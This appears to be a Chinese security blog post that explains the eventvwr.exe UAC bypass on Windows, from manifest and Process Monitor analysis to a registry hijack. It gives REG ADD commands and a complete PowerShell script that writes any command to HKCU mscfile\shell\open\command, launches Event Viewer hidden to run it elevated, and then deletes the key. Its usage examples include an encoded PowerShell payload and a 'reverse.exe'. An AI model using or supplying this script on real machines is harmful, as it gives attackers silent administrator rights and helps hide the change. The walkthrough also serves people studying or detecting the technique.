Bypass UAC Eventvwr

Bypass UAC eventvwr.exe

1
sigcheck.exe -m C:\Windows\System32\eventvwr.exe

输出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"  xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="amd64"
    name="Microsoft.Windows.Eventlog.EventVwr"
    type="win32"
/>
<description>Event Viewer Snapin Launcher</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="highestAvailable"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
<asmv3:application>
   <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
        <autoElevate>true</autoElevate>
   </asmv3:windowsSettings>
</asmv3:application>
</assembly>

执行权限级别

1
2
3
4
5
6
<requestedPrivileges>
    <requestedExecutionLevel
        level="highestAvailable"
        uiAccess="false"
    />
</requestedPrivileges>
  • highestAvailable: 此程序将以当前用户能获取的最高权限来运行
  • requireAdministrator: 应用程序仅为管理员运行,并要求使用管理员的完整访问令牌启动应用程序

level='highestAvailable': The application runs at the highest permission level that it can. If the user who starts the application is a member of the Administrators group, this option is the same as level=’requireAdministrator’. If the highest available permission level is higher than the level of the opening process, the system prompts for credentials.

uiAccess='true' if you want the application to bypass user interface protection levels and drive input to higher-permission windows on the desktop; otherwise, uiAccess=’false’. Defaults to uiAccess=’false’. Set this argument to uiAccess=’true’ only for user interface accessibility applications.


autoelevate 标志被设置为 true,允许可执行文件自动提升到高完整性,而不提示管理员用户是否同意

1
<autoElevate>true</autoElevate>

Process Monitor Filter:

  • Process Name is eventvwr.exe
  • Operation contains Reg
  • Result is NAME NOT FOUND

有如下条目

1
2
HKCU\Software\Classes\mscfile\shell\open\command    NAME NOT FOUND
HKCR\mscfile\shell\open\command\DelegateExecute     NAME NOT FOUND

检查 HKCR\mscfile\shell\open\command\(default)

1
%SystemRoot%\system32\mmc.exe "%1" %*

创建丢失项并添加值(若是不添加值: Cannot start Event Viewer)

1
2
3
REG ADD HKCU\Software\Classes\mscfile\shell\open\command

REG ADD HKCU\Software\Classes\mscfile\shell\open\command /d "cmd /c start C:\Windows\System32\cmd.exe" /f

若是直接使用 C:\Windows\System32\cmd.exe 作为值,并不会打开一个 cmd 窗口,cmd 进入后台

show


Process Monitor Filter:

  • PATH contains mscfile\shell\open\command
  • delete Result is NAME NOT FOUND

重新运行 eventvwr

1
HKCU\Software\Classes\mscfile\shell\open\command    SUCCESS

1
Start-Process -FilePath C:\Windows\System32\eventvwr.exe

priv


EventvwrBypassUAC.ps1 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<#
.SYNOPSIS  
    By adding a new registry structure to the "HKCU\Software\Classes\" registry to perform an UAC bypass to start any application.

    Only tested on Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601

.NOTES  
    Function   : EventvwrBypassUAC
    File Name  : EventvwrBypassUAC.ps1 
    Author     : 0x20c

.PARAMETER Command
    any command. 
    EventvwrBypassUAC -Command powershell -enc EDFH...
    EventvwrBypassUAC -Command "cmd /c start C:\Windows\reverse.exe"

.LINK  
    https://github.com/0x20c

.EXAMPLE
    EventvwrBypassUAC -Command "cmd /c start cmd.exe"
#>

function EventvwrBypassUAC()
{ 
    Param (          
        [String]$Command = "cmd /c start cmd.exe" # default
    )

    # Create registry structure
    New-Item -Path HKCU:\Software\Classes\mscfile\shell\open\command -Force
    # New-ItemProperty -Path HKCU:\Software\Classes\mscfile\shell\open\command -Name "(default)" -PropertyType String -Value $cmd -Force
    Set-ItemProperty -Path HKCU:\Software\Classes\mscfile\shell\open\command -Name "(default)" -Value $Command -Force

    # Perform the bypass
    Start-Process "C:\Windows\System32\eventvwr.exe" -WindowStyle Hidden

    # Remove registry structure
    Start-Sleep 3
    Remove-Item HKCU:\Software\Classes\mscfile -Recurse -Force

}
信息安全
BypassUAC

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!